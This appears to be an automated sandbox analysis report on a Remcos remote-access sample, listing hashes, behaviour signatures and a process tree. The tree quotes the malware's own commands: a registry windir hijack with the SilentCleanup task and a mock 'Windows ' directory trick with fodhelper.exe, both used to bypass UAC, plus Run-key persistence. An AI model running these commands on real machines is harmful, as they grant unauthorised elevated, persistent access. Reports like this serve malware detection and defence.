Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    09-07-2020 00:36

General

  • Target

    remcos.exe

  • Size

    649KB

  • MD5

    c088802b03e3bc1ef0082f268847a5f7

  • SHA1

    28fd21058e88cd0e77cc9da119c7b7ecd582e2ac

  • SHA256

    4444f1da7f9b30eb4fb593b9492e42745332402980e118b6a0431c7d1f5670ce

  • SHA512

    6f296335284aa8337a60df52ffae7f87eb29502cea0ab050e2429ad841f79cd757a3e75a75cfb32463458d646d92ead9476c99fa4d058113be02b903b99e0d6a

Score
8/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 530 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run entry to start application 2 TTPs 1 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs

Processes

  • C:\Users\Admin\AppData\Local\Temp\remcos.exe
    "C:\Users\Admin\AppData\Local\Temp\remcos.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Adds Run entry to start application
    PID:3176
    • C:\Windows\SysWOW64\TapiUnattend.exe
      "C:\Windows\System32\TapiUnattend.exe"
      2⤵
        PID:1880
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c C:\Users\Public\Natso.bat
          3⤵
            PID:1788
            • C:\Windows\SysWOW64\reg.exe
              reg delete hkcu\Environment /v windir /f
              4⤵
              • Modifies registry key
              PID:408
            • C:\Windows\SysWOW64\reg.exe
              reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "
              4⤵
              • Modifies registry key
              PID:4108
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
              4⤵
                PID:4136
              • C:\Windows\SysWOW64\reg.exe
                reg delete hkcu\Environment /v windir /f
                4⤵
                • Modifies registry key
                PID:4216
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c C:\Users\Public\Runex.bat
              3⤵
                PID:4156
                • C:\Windows \System32\fodhelper.exe
                  "C:\Windows \System32\fodhelper.exe"
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:4268
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat
                    5⤵
                      PID:4304
              • C:\Program Files (x86)\internet explorer\ieinstal.exe
                "C:\Program Files (x86)\internet explorer\ieinstal.exe"
                2⤵
                  PID:1772

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • memory/3176-135-0x0000000010530000-0x000000001054A000-memory.dmp

                Filesize

                104KB

              • memory/3176-124-0x0000000010410000-0x0000000010450000-memory.dmp

                Filesize

                256KB